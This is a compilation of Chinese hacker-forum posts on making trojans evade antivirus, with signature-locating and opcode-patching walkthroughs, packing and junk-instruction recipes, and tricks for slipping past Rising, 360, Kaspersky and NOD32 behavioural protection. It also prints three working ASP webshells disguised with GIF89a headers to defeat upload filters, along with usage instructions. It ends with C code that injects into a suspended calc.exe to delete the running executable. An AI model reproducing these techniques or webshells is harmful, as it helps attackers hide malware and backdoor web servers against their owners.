下面是小编为大家整理的免杀个人经验,本文共10篇,仅供大家参考借鉴,希望大家喜欢!本文原稿由网友“你看起来很好吃”提供。
篇1:免杀个人经验
1.比如你定位一个特征码定位到了一个字符串上我们比如这个特征码定位到HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run,遇到这个我想大家一定是修改大小写吧,但是有时候修改大小写还是被杀, 这个我们可以怎么办呢,我们可以移动位置,因为这个肯定是一个api函数的参数,我们找到那个函数然后修改下调用地址就行了。 所以有时候大家不能总用通用方法,要学会变通。
2.NOD32的疑问
前天有一个会员来问我他说它定位NOD32,定位到了资源上,这个有一个可能是你的定位有错误。这个你可以通过multiccl把资源和输入表段保护起来,然后定位,看可以定位出其他的特征码不能。
3.花指令
花指令无非是一些干扰程序调试的一些手段,当然也可以作为用来迷惑杀毒软件使杀毒软件找不到我们的特征码,从而达到免杀。
为什么大家总是喜欢用网上的一些什么花指令方法,
其实我发现其实多调用一些子程序,多加一些跳转,要比你们写花指令要好的多。 比如你写一些废话 然后通过call调用,然后在多加几个跳转。我想免杀的时间要比你们在那里对照8080汇编手册写出来的要好的多,免杀就是要靠自己去想。
4.DLL文件免杀出现重定位
大家可以参考黑防9期文章里的那篇文章,这里我不多讲了。。
5.为什我服务端做了免杀,可是生成出来被杀。
这个大家首先可以对比一下有什么不同的地方,这个我给大家一个思路,现在杀毒软件就喜欢定位有标志型意义的地方(通俗点讲版权信息),大家在做的时候因为为了保护我们的木马,所以就委屈下原作者,呵呵。版权信息给改了。 还有一个就是比如说灰鸽子,现在杀软会定位到它的一些dll文件名上,你修改完dll然后找到调用dll文件的函数,然后修改下参数即可。。。。
6.定位技巧
我总是教导大家要学会变通,可是总是没人听。比如你用MYCLL定位特征码为什么总是跟着别人学呢。别人用00填充你就用00填充,有一些杀软有反定位措施的,会判断的, 这里推荐给大家用multiCCL,它这个随机生成数据串填充。或者你在MYCLL定位的时候改一下用60都可以啊。
篇2:浅谈免杀经验技巧
今天给大家谈一下免杀的小技巧,技术不大,全是经验。希望大家看完后有所收获。
1:
004B3920: 64:8910 MOV FS:[EAX],EDX
004B3923: 68 35454B00 PUSH 4B4535 -------------替换处(2)
004B3928: E8 83D3FFFF CALL 004B0CB0
004B392D: C3 RETN
004B392E: E9 E9FDF4FF JMP 0040371C
004B3933: EB F3 JMP SHORT 004B3928
004B3935: 33C0 XOR EAX,EAX
004B3937: 5A POP EDX
004B3938: 59 POP ECX
004B3939: 59 POP ECX
004B393A: 64:8910 MOV FS:[EAX],EDX
004B393D: 68 5D454B00 PUSH 4B455D -------------假设特征码处(1)
004B3942: 8D85 64FDFFFF LEA EAX,SS:[EBP-29C]
004B3948: E8 4F04F5FF CALL 00403D9C
004B394D: 8D45 FC LEA EAX,SS:[EBP-4]
004B3950: E8 4704F5FF CALL 00403D9C
004B3955: C3 RETN
假设特征码处(1),大家看下是不是觉得很难改,改了有些可能出错,跳转一般都不行,
我们可以试一下和(2)处交换下。看是不是是能免杀上线。如何可以吧。因为他们都是压入堆栈,我们只是换了个地址而已。
2:
004B3920: 64:8910 MOV FS:[EAX],EDX
004B3923: 68 35454B00 PUSH 4B4535
004B3928: E8 83D3FFFF CALL 004B0CB0 ------假设特征码处(1)
004B392D: C3 RETN
004B392E: E9 E9FDF4FF JMP 0040371C
004B3933: EB F3 JMP SHORT 004B3928
004B3935: 33C0 XOR EAX,EAX
004B3937: 5A POP EDX
004B3938: 59 POP ECX
在看这个特征码处 ,假设跳转不行,无法上线。那么我们和下面或上面的代码交换下位置试一试。看下是否上线了,而且功能全齐吧!
还有些比较厉害的杀毒软件把你ccl或myccl生成出的特征码全都给杀了,是吧。你可以试一试加壳,再查。如果你想做无壳的。怎么办?办法还是有。你去头加区。试一试不用新加的哪个区段去CCL或MYCCL去生成特征码试一试。有些可能不行,比如黑防。
在这只是给大家介绍些经验,希望各位多多研究,多想些办法。不要放弃。肯定是有办法的。只要你肯研究我不相信你就免杀不了。
不说了,今天就到这,这只是说说经验,当然上面的方法是我自己想出来的,我不保证100%成功。只想给大家一个启发。
送大家免杀6字真言:不放弃,多研究!
篇3:下木马免杀的个人经验
PE类:EXE. dll
1.脱壳解密
脱壳在木马免杀中由为重要!,。所以希望大家好好学习脱壳
脱壳的好坏直接影响到木马免杀效果(如果不完全脱壳,在<定位内存特征码>可能会使定位中没发现特征码但是运行中又发现木马。)
2.定位特征码
一般从大范围定位后逐渐缩小范围(字节型)
(个数型)一般从生成100个数的大致定位特征码后转入字节型定位。
单一文件特征码定位:CLL MYCLL multiCCL
复合文件特征码定位:MYCLL multiCCL
内存特征码定位: OD(一半一半定位) MYCLL multiCCL [一般都要确定你的文件是否完美完全脱壳后在进行文件特征码定位]
3.特征码修改
简单的等效代码转换如下:(不过有时改后也损坏文件所以看情况)
push 变 pop
je 变 jnz
add 变 sub
add ecx,2 可以改为 sub ecx,-2
加ecx内存器+2 减ecx内存器-2 - -2得=2
上面的等效代码用不了还是乖乖用,JMP跳转法把特征码转移
4.附加数据加密算法变形
这个方法已经被pcshare冰雨发布了,就是pcshare附加数据的配置信息是xor 加密的。被杀毒定义了 所以我们只要改算法 xor 值 变一下就可以了!
5.RAR自解压(加密)
说白就是捆绑而已呵呵,不过去除右键 对部分杀毒有效无法分离出木马!可以躲避查杀 而且可变性比较强所以还有用武之地!
*******************************************************
网页木马类: JS html htm asp 等
1.拆分变量,
用&连接符号,拆分变量
2.加入垃圾代码。
和PE免杀花指令差不多,一些无用的垃圾变量或者空格一些特殊字符 或者GIF98 类似的文件头来做“花指令”呵呵!
3.等值代码修改
把html全部改htm 效果一样
4.代码添零
在记事本中加入空格,然后用16进制的编辑器(Uedit32)打开把 空格对应(20)替换成(00) 即可
该方法运用广泛。使用简单!!推荐 呵呵
5.编码加密(工具见附件)
6.使用变量(赋值语句)
变量名 = 函数或者语句
然后用的时候直接写变量名
7.字符反置(StrReverse反转函数)
使用函数StrReverse,asp和js里面都有这个函数,针对一些字符串做免杀很好!
使用:StrReverse('哦的示演'), 输出结果就是“演示的哦” 也就是字符位置倒排了。做ASP免杀和HTML网马效果应该很不错。
(这类应用需要琢磨一下,比较容易出错特别是对 语言不熟悉的 建议看些书或者相关知识在弄)
篇4:过主动防御的免杀经验
我们做木马免杀主要是针对杀毒的特征进行免杀,
所以市面上也出了一些针对特定杀毒软件的加壳软件等等。
为什么木马免杀会成为一门课程。因为难就难在特征码的修改。也就是汇编代码的修改。以及免杀汇编的编写。
当然,对于免杀我们还是要求巧。何为巧。就是针对杀毒的特征进行特征性的免杀。经过我的免杀总结,我总结了如下的免杀经验告诉大家如何过一些杀毒的主动防御。当然,这只是过主动防御,主动防御过了,还有文件免杀,以及内存免杀。请大家注意。
下面提到的过主动防御的杀毒有。瑞星,360,卡巴,NOD。
我公布几个最新的过杀毒主动防御的方法。
1、瑞星(下载地址:www.heibai.net/download/Soft/Soft_20635.htm)
程序运行后,立刻修改掉程序名字即可过主动
2、360杀毒
想过保护,把程序名字改成一些特定的,就可以过了 360也不报
比如说,你想安装个自动启动的服务,一般360都会报, 只要那服务的名字是一些特定的名字,就不报了,
3、卡巴(下载地址:www.heibai.net/download/Soft/Soft_20527.htm)
把程序改成中文名字就过了……
4、NOD
把小马释放到C:\\Windows\\System32\\svchost1.exe
然后把原本的svchost.exe改个名字,把小马改成svchost.exe
运行
然后恢复名字
这个方法还可以过某些防火墙,比如金山网彪
对于编程人员来说。过主动。也简单的。
例如:如果发现要写入C:\\Windows\\System32\\ 会报警
那就不要用复制API,直接用写入文件,就不报了。
篇5: 常用的各种免杀技术
一、要使一个木马免杀
首先要准备一个不加壳的木马,这点非常重要,否则 免杀操作就不能进行下去,
常用的各种免杀技术归纳
。 然后我们要木马的内存免杀,从上面分析可以看出,目前的内存查杀,只有瑞星最强,其它杀毒软件内存查杀现在还不起作用所以我们只针对瑞星的内存查杀,要进行内存特征码的定位和修改,才能内存免杀。
二、对符其它的杀毒软件
比如江民,金山,诺顿,卡巴。我们可以采用下面的方法,或这些方面的组合使用。
1>.入口点加1免杀法。
2>.变化入口地址免杀法
3>.加花指令法免杀法
4>.加壳或加伪装壳免杀法。
5>.打乱壳的头文件免杀法。
6>.修改文件特征码免杀法。
三、免杀技术实例演示部分
1、入口点加1免杀法:
1)用到工具:PEditor
2)特点:非常简单实用,但有时还会被卡巴查杀。
3)操作要点:用PEditor打开无壳木马程序,把原入口点加1即可。
2、变化入口地址免杀法:
1)用到工具:OllyDbg,PEditor
2)特点:操作也比较容易,而且免杀效果比入口点加1点要佳。
3)操作要点:用OD载入无壳的木马程序,把入口点的前二句移到零区域去执行,然后又跳回到入口点的下面第三句继续执行。最后用PEditorr把入口点改成零区域的地址。
3、加花指令法免杀法:
1)用到工具:OllyDbg,PEditor
2)特点:免杀通用性非常好,加了花指令后,就基本达到大量杀毒软件的免杀。
3)操作要点:用OD打开无壳的木马程序,找到零区域,把我们准备好的花指令填进去填好后又跳回到入口点,保存好后,再用PEditor把入口点改成零区域处填入花指令的着地址。
4、加壳或加伪装壳免杀法:
1)用到工具:一些冷门壳,或加伪装壳的工具,比如木马彩衣等。
2)特点:操作简单化,但免杀的时间不长,可能很快被杀,也很难躲过卡巴的追杀。
3)操作要点:为了达到更好的免杀效果可采用多重加壳,或加了壳后在加伪装壳的免杀效果更佳。
5、打乱壳的头文件或壳中加花免杀法:
1)用到工具:秘密行动 ,UPX加壳工具,
2)特点:操作也是傻瓜化,免杀效果也正当不错,特别对卡巴的免杀效果非常好。
3)操作要点:首先一定要把没加过壳的木马程序用UPX加层壳,然后用秘密行动这款工具中的SCramble功能进行把UPX壳的头文件打乱,从而达到免杀效果。
6、修改文件特征码免杀法:
1)用到工具:特征码定位器,OllyDbg
2)特点:操作较复杂,要定位修改一系列过程,而且只针对每种杀毒软件的免杀,要达到多种杀毒软件的免杀,必需修改各种杀毒软件的特征码。但免杀效果好。
3)操作要点:对某种杀毒软件的特征码的定位到修改一系列慢长过程。
四、快速定位与修改瑞星内存特征码
1、瑞星内存特征码特点:由于技术原因,目前瑞星的内存特征码在90%以上把字符串作为病毒特征码,这样对我们的定位和修改带来了方便。
2、定位与修改要点:
1)首先用特征码定位器大致定位出瑞星内存特征码位置
2)然后用UE打开,找到这个大致位置,看看,哪些方面对应的是字符串,用0替换后再用内存查杀进行查杀。直到找到内存特征码后,只要把字符串的大小写互换就能达到内存免杀效果。
五、木马免杀综合方案
修改内存特征码――>1)入口点加1免杀法――>1>加压缩壳――>1>再加壳或多重加壳
2)变化入口地址免杀法 2>加成僻壳 2>加壳的伪装。
3)加花指令法免杀法 3>打乱壳的头文件
4)修改文件特征码免杀法
注:这个方案可以任意组合各种不同的免杀方案。并达到各种不同的免杀效果。
六、免杀方案实例演示部分
1、完全免杀方案一:
内存特征码修改 + 加UPX壳 + 秘密行动工具打乱UPX壳的头文件。
2、完全免杀方案二:
内存特征码修改 + 加压缩壳 + 加壳的伪装 )
3、完全免杀方案三:
GD内存特征码修改 + 修改各种杀毒软件的文件特征码 + 加压缩壳
4、完全免杀方案四:
内存特征码修改 + 加花指令 + 加压壳
5、完全变态免杀方案五:
内存特征码修改 + 加花指令 + 入口点加1 + 加压缩壳UPX + 打乱壳的头文件
还有其它免杀方案可根据第五部分任意组合
篇6:灰鸽子免杀原理
一.关于免杀的来源
为了让我们的木马在各种杀毒软件的威胁下活的更久.
二.什么叫免杀和查杀
可分为二类:
1.文件免杀和查杀:不运行程序用杀毒软件进行对该程序的扫描,所得结果,
2.内存的免杀和查杀:判断的方法:
1.运行后,用杀毒软件的内存查杀功能.
2.用OD载入,用杀毒软件的内存查杀功能.
三.什么叫特征码
1.含意:能识别一个程序是一个病毒的一段不大于64字节的特征串.
2.为了减少误报率,一般杀毒软件会提取多段特征串,这时,我们往往改一处就可达到
免杀效果,当然有些杀毒软件要同时改几处才能免杀.(这些方法以后详细介绍)
3.下面用一个示意图来具体来了解一下特征码的具体概念
四.特征码的定位与原理
1.特征码的查找方法:文件中的特征码被我们填入的数据(比如0)替换了,那杀毒软
件就不会报警,以此确定特征码的位置
2.特征码定位器的工作原理:原文件中部分字节替换为0,然后生成新文件,再根据杀
毒软件来检测这些文件的结果判断特征码的位置
五.认识特征码定位与修改的工具
1.CCL(特征码定位器)
2.OOydbg (特征码的修改)
3.OC用于计算从文件地址到内存地址的小工具.
4.UltaEdit-32(十六进制编辑器,用于特征码的手工准确定位或修改)
六.特征码修改方法
特征码修改包括文件特征码修改和内存特征码修改,因为这二种特征码的修改方法
是通用的。所以就对目前流行的特征码修改方法作个总节。
方法一:直接修改特征码的十六进制法
1.修改方法:把特征码所对应的十六进制改成数字差1或差不多的十六进制.
2.适用范围:一定要精确定位特征码所对应的十六进制,修改后一定要测试一下能
否正常使用.
方法二:修改字符串大小写法
1.修改方法:把特征码所对应的内容是字符串的,只要把大小字互换一下就可以了.
2.适用范围:特征码所对应的内容必需是字符串,否则不能成功.
方法三:等价替换法
1.修改方法:把特征码所对应的汇编指令命令中替换成功能类拟的指令.
2.适用范围:特征码中必需有可以替换的汇编指令.比如JN,JNE 换成JMP等.
如果和我一样对汇编不懂的可以去查查8080汇编手册.
方法四:指令顺序调换法
1.修改方法:把具有特征码的代码顺序互换一下.
2.适用范围:具有一定的局限性,代码互换后要不能影响程序的正常执行
方法五:通用跳转法
1.修改方法:把特征码移到零区域(指代码的空隙处),然后一个JMP又跳回来执行.
2.适用范围:没有什么条件,是通用的改法,强烈建议大家要掌握这种改法.
七.木马免杀的综合修改方法
文件免杀方法:
1.加冷门壳
2.加花指令
3.改程序入口点
4.改木马文件特征码的5种常用方法
5.还有其它的几种免杀修改技巧
内存免杀方法:
修改内存特征码:
方法1>直接修改特征码的十六进制法
方法2>修改字符串大小写法
方法3>等价替换法
方法4>指令顺序调换法
方法5>通用跳转法
木马的免杀[学用CLL定位文件和内存特怔码]
1.首先我们来看下什么叫文件特征码.
一般我们可以这样认为,一个木马程序在不运行的情况下,用杀毒软件查杀,若报警为病毒,说明存在该查毒软件的文件特征码的,
2.特征码的二种定位方法.
手动定位和自动定位
3.文件特征码的定位技巧.
通常用手动确定大范围,用自动精确定位小范围.
下面分别用瑞星和卡巴为例,实例演示并结合手动定位和自动定位二种方法来准确定位文件特征码。要定位的对像以下载者为例。
用卡巴来定位文件特征码
⑴.手动定位:
1.打开CLL
2.选择设置中的 总体参数 ,,,,,选中文件特征码手动定位,,,,以及路径
3选中设置中的 手动参数,,,,,选择替换方式 选中,,,总共生成规定个数的文件,,,生成个数为1000
4选择文件中的 特征码检测,,文件特征码检测,,,打开程序(要定位特证码的程序)
5在弹出的PE窗口中 直接点确定 ,之后弹出的窗口在点确定
6然后等CLL生成完毕之后用杀毒软件进行查杀
7在CLL中选 操作,结果定位,选中刚刚用来存放检测结果的文件夹
8在CLL中选
文件免杀之加花指令法
一.花指令相关知识:
其实是一段垃圾代码,和一些乱跳转,但并不影响程序的正常运行。加了花指令后,使一些杀毒软件无法正确识别木马程序,从而达到免杀的效果。
二.加花指令使木马免杀制作过程详解:
第一步:配置一个不加壳的木马程序。
第二步:用OD载入这个木马程序,同时记下入口点的内存地址。
第三步:向下拉滚动条,找到零区域(也就是可以插入代码的都是0的空白地方)。并记下零区域的起始内存地址。
第四步:从这个零区域的起始地址开始一句一句的写入我们准备好的花指令代码。
第五步:花指令写完后,在花指令的结束位置加一句:JMP 刚才OD载入时的入口点内存地址。
第六步:保存修改结果后,最后用PEditor这款工具打开这个改过后的木马程序。在入口点处把原来的入口地址改成刚才记下的零区域的起始内存地址,并按应用更改。使更改生效。
三.加花指令免杀技术总节:
1.优点:通用性非常不错,一般一个木马程序加入花指令后,就可以躲大部分的杀毒软件,不像改特征码,只能躲过某一种杀毒软件。
2.缺点:这种方法还是不能过具有内存查杀的杀毒软件,比如瑞星内存查杀等。
3.以后将加花指令与改入口点,加壳,改特征码这几种方法结合起来混合使用效果将非常不错。
四.加花指令免杀要点:
由于 网站公布的花指令过不了一段时间就会被杀软辨认出来,所以需要你自己去搜集一些不常用的花指令,另外目前还有几款软件可以自动帮你加花,方便一些不熟悉的朋友,例如花指令添加器等。
[1] [2] [3] 下一页
篇7:灰鸽子vip简单免杀
测试的平台有:咔吧,瑞星,江民,金山,nod32,诺顿
工具:MyCCL复合特征码定位器 官方下载地址:www.allinhack.com/blog/
Ollydbg 这个看雪有下载 www.pediy.com
OC 官方下载地址:www.vxer.cn/hmx/
UE 这个工具华军软件园有下
Rescope 这个看雪有下载 www.pediy.com
nsAnt.exe 一个猛壳,打包给大家
免杀思路:我个人认为应该先给你的木马加壳或者加花,然后用杀毒软件杀一下,看看有那些杀毒软件杀,然后单独定位那个杀毒软件的特征码,修改特征码的时候,先直接改试试,然后如果不行再指令调换或者通用跳转法!最后加壳和加花处理,免杀就成功了!
现在瑞星的内存查杀好象不那么强了,咔吧的文件查杀是依然那么变态,而且特征码更新的很勤!nsAnt.exe这款壳很猛,加壳后只有咔吧杀,其他都过,所以我们就只定位卡巴的文件特征码!然后修改!
免杀过程:1.导出MAINDLL.DLL,然后再导出GETKEY.DLL,我们看看查杀结果,咔吧杀,江民杀,nod32杀,瑞星杀,诺顿过,金山杀!我们来给它加个壳,在看查杀的结果,只剩咔吧杀了!
咔吧的文件查杀果然是强!我们来定位特征码,用MyCCL,操作很简单,大家看我操作就可以了!
2.GETKEY.DLL咔吧文件特征码定位结果:
[特征] 0000AFB9_00000002//003dBBB9我们用oc转一下地址,注意这里要改成3d
指令调换:
003DBBB6 |. 8D45 F8 lea eax,dword ptr ss:[ebp-8]
003DBBB9 BA 06000000 mov edx,6
3.加壳在看查杀结果!全过!
4.把GETKEY.DLL导回到MAINDLL.DLL,在看看MAINDLL.DLL的查杀情况,咔吧是不杀的,其他的我们只要加个壳就过了!
5.MAINDLL.DLL导回到Setup.exe,看看查杀结果,咔吧还是杀的,定咔吧的特征码,然后改掉!在加壳就都过了!
6.Setup.exe咔吧文件特征码定位结果:
[特征] 0000BD6A_00000004//1314C96A
[特征] 0000C202_00000004//1314CE02 和刚才定的不太一样,因为有的时候,你分块不同结果也可能不同!
一共有两处都需要改!
第一处,[特征] 0000BD6A_00000004//1314C96A
1314C967 A1 50E91413 mov eax,dword ptr ds:[1314E950]
1314C96C 50 push eax
指令顺序调换,就可以了!
第二处,[特征] 0000C202_00000004//1314CE02
大小写替换一下就可以了!我们定位的结果是很准的,看咔吧不杀了吧!
7.最后加壳,看免杀效果,瑞星的内存是过的!看看能不能上线!看瑞星的内存查杀已经不那么强了,我们并没有去定为内存!好了,都过了,
希望大家都能有自己免杀的鸽子!
总是定在文件头,可以先给鸽子加个壳,在定!或者去头在定!因为是复合特征码的原因!
篇8:免杀的一些观点
对于花指令:好多朋友都在满世界的找一些所谓的免杀的花指令.可是你在网上找到的都是一些以经公开了的.早就被杀了.就算暂时不杀.但是他的免杀期并不是由你来控制的.因为你也不知道哪一天会被杀软追杀.其实花指令在木马免杀中的作用就是干扰其正常的查杀顺序,对于一个木马来说如果是单一特征码的话,你加了花指令还杀的话.我想杀的也是花指令中的一处代码.那你完全可以在定位这个木马.查看是不是特征码以经在花指令上边了..(一般情况下都是这样的)如果在的话那就太好改了.因为花指令本身就是废话指令.无外呼就是来回的跳转.来回的压入,弹出.捎微掌握点汇编知识就能搞定了.
对于国产的杀软好多都是你把木马文件的头部转移了,就可以免杀了!!
对于加壳.因为有些壳加了木马就不能用了.有些呢..因为大家都用.所以也以经被杀了.可是杀也是杀他的壳..
对于卡吧.NOD32.诺顿等一些比教强的杀毒软件他强处之一就是他有很强的脱壳能力,就是他可以先把你的壳脱掉在来查杀木马.所以我要是给木马加壳的话就是找一些新壳,然后先加一道壳.在载入freeRES中释放资源.然后在加一道.不行就用同样的方法,在叫一道..但是就这样也不一定能过了杀毒.
好用的壳北斗.小辉的PE加密..
更改特征码:我认为做免杀的正道还是更改特征码免杀,木马的特征码都该完了后在找两个好壳加上.那你在看看免杀长不长吧.
在做定位免杀时也不能只更改你定位出来的那个特征码.你要看程序的整体汇编含意是什么,
比如:你定位的特征码在
卡吧 [特征] 0000B585_00000003 转内存地址: 0040B585
OD载入找到卡吧特征码的位置是
0040B57C |. E8 7F89FFFF CALL 木马.00403F00
0040B581 |. 8BD0 MOV EDX,EAX
0040B583 |. B9 08BC4000 MOV ECX,木马.0040BC08 ; ASCII “KpopMon”
0040B588 |. B8 0080 MOV EAX,80000002
也就是说0040B585是0040B583指令中的一部份.(这个要是不明白我就没话可说了)
那你就看0040B583 处的指令是什么意思..
是把0040BC08处的ASCII “KpopMon”传送到寄存器ECX里.那这段你要是改的话就要到0040BC08地址处去调整他的位置.然后在回来把0040B583的指针调整就可以了.
还可以怎么改.在看0040B57C |. E8 7F89FFFF CALL 木马.00403F00
实际上现在的杀毒公司定位的特征码大部分都在CALL和JMP..上边
CALL是过程调用指令
那刚才那段OD中的指令你往上看还可以看到
0040B57C |. E8 7F89FFFF CALL 木马.00403F00
这句就是0040B57C调用00403F00中的指令.
其中CALL 木马.00403F00的位置查看00403F00的位置是
00403EFF 90 NOP
00403F00 /$ 85C0 TEST EAX,EAX
00403F02 |. 74 02 JE SHORT kk_.00403F06
00403F04 |. C3 RETN
00403F05 | 00 DB 00
00403F00上面是NOP.那你就可以把
0040B57C |. E8 7F89FFFF CALL 木马.00403F00的指针调整为
0040B57C |. E8 7F89FFFF CALL 木马.00403EFF
这样也能免杀.而且还没有改变堆栈平衡..其他的功能也决对不会有什么变化
所以做免杀一定要掌握的就是汇编指令的含意.这个很简单并不是要你去完全的学会汇编的
篇9:超强版免杀asp小马
第一款 :
GIF89a$ ;
<%eval request(chr(1))%>
<%
on error resume next
testfile=Request.form(“filepath”)
msg=Request.form(“message”)
if Trim(request(“filepath”))“” then
set fs=server.CreateObject(“scripting.filesystemobject”)
set thisfile=fs.CreateTextFile(testfile,True)
thisfile.Write(“”&msg& “”)
if err =0 Then
response.write “ok”
else
response.write “no”
end if
err.clear
thisfile.close
set fs = nothing
End if
%>
value=“<%=server.mappath(”go.asp“)%>”>
第二款:
GIF89a$ ;
<%eval request(chr(1))%>
<% if request(“action”)=“kof97” then %>
<%on error resume next%>
<%ofso=“scripting.filesystemobject”%>
<%set fso=server.createobject(ofso)%>
<%path=request(“path”)%>
<%if path“” then%>
<%data=request(“dama”)%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%=“success”%>
<%else%>
<%=“false”%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%=“
<%=“”%>
<%=“
”%>
<%=server.mappath(request.servervariables(“script_name”))%>
<%=“
”%>
<%=“”%>
<%=“”%>
<%=“
”%>
<%=“”%>
<%=“”%>
<% end if %>
第三款:
<%set s=server.createObject(“Adodb.Stream”)%>
<%s.Type=2%>
<%s.Open%>
<%s.CharSet=“gb2312”%>
<%s.writetext request(“d”)%>
<%s.SaveToFile server.mappath(“go.asp”),2%>
<%s.Close%>
<%set s=nothing%>
使用说明及介绍:
第一款 功能说明: 用一句话连接进行传马 或直接传马
GIF89a$ ; --[这里的意思相信大家都了解 意思就是 上传图片时起到欺骗的作用.]
<%eval request(chr(1))%>--[这是就asp一句话木马 这里的 chr(1) 就是asp一句话木马的密码
那么实际chr(1)= 所以密码为 别说你不知知道
重点来了 当你用这个ASP小马时 你可以用这个asp小马来里面的一句话进行传大马 然也可以直接用这个传大马
<%=server.mappath(“go.asp”)%>“>
这里的go.asp就是上传马的地址了 这个自己可以修改 说的够详细吧
第二款:
同上功能就不说了!
<% if request(”action“)=”kof97“ then %>相信懂ASP的一看就明白! 也不多说了
用法是 直接在你小马地址后面加上 ?action=kof97 给个例子吧
www.xxx.com/xxx.asp?action=kof97kof97这个改成自己的!在小马里面改
好处就是 当别人直接访问你的小马时 显示的是空白 无法使用你的小马 与要密码的小马差不多
第三款:
可以说是除了ASP一句话小马之外就非它莫属了! 只有两百多个字节
<%s.SaveToFile server.mappath(”go.asp“),2%>当你打开小马地址就会自动生成go.asp 修改成自己的
此小马要与 一句话小马 或其它小马 配合使用 当你在在输入框写入我们的马 然后点 提交 会自动生成go.asp 小马地址
好处就是 当别人直接访问你的小马时 不管他提交什么马 他不知道你设置的那个文件地址
此文如有错误之处 请联系八神 或在我的博客里留言 !谢谢!
请注明!
篇10:已测试通过的免杀代码
Exe自杀源程序:
//hi.baidu.com/zxhouse
#include
BOOL DeleteMyself(WCHAR *pHelper)
{
int ret;
WCHAR helper[MAX_PATH];
ZeroMemory(helper, sizeof(helper));
if (pHelper)
wcsncpy(helper, pHelper, MAX_PATH-2);
else
wcscpy(helper, L”calc.exe“);
STARTUPINFOW si = {sizeof(STARTUPINFOW),0};
PROCESS_INFORMATION pi;
HANDLE hSYNC = OpenProcess(SYNCHRONIZE, TRUE, GetCurrentProcessId());
if (CreateProcessW(NULL, helper, 0, 0, TRUE, CREATE_SUSPENDED, 0, 0, &si, &pi))
{
CONTEXT ctx = {CONTEXT_FULL,0};
ret = GetThreadContext(pi.hThread, &ctx);
WCHAR MyselfPath[MAX_PATH];
int nPathLen = GetModuleFileNameW(NULL, MyselfPath, MAX_PATH);
struct StackContext
{
DWORD_PTR DeleteFileW;
DWORD_PTR WaitForSingleObject_argv1;
DWORD_PTR WaitForSingleObject_argv2;
DWORD_PTR ExitProcess;
DWORD_PTR DeleteFileW_argv1;
DWORD_PTR shit;
DWORD_PTR ExitProcess_argv1;
}stackctx;
HMODULE hKernel32 = GetModuleHandleW(L”Kernel32.dll“);
ctx.Eip = (DWORD_PTR)GetProcAddress(hKernel32, ”WaitForSingleObject“);
ctx.Esp = (DWORD_PTR)VirtualAllocEx(pi.hProcess, 0, 512*1024, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
ctx.Esp += 256*1024;
stackctx.DeleteFileW = (DWORD_PTR)GetProcAddress(hKernel32, ”DeleteFileW“);
stackctx.WaitForSingleObject_argv1 = (DWORD_PTR)hSYNC;
stackctx.WaitForSingleObject_argv2 = (DWORD_PTR)-1;
stackctx.ExitProcess = (DWORD_PTR)GetProcAddress(hKernel32, ”ExitProcess\");
stackctx.DeleteFileW_argv1 = (DWORD_PTR)VirtualAllocEx(pi.hProcess, 0, (nPathLen+1)*sizeof(WCHAR), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
ret = WriteProcessMemory(pi.hProcess, (LPVOID)stackctx.DeleteFileW_argv1, MyselfPath, (nPathLen+1)*sizeof(WCHAR), NULL);
if (!ret) return FALSE;
stackctx.shit = 0;
stackctx.ExitProcess_argv1 = 0;
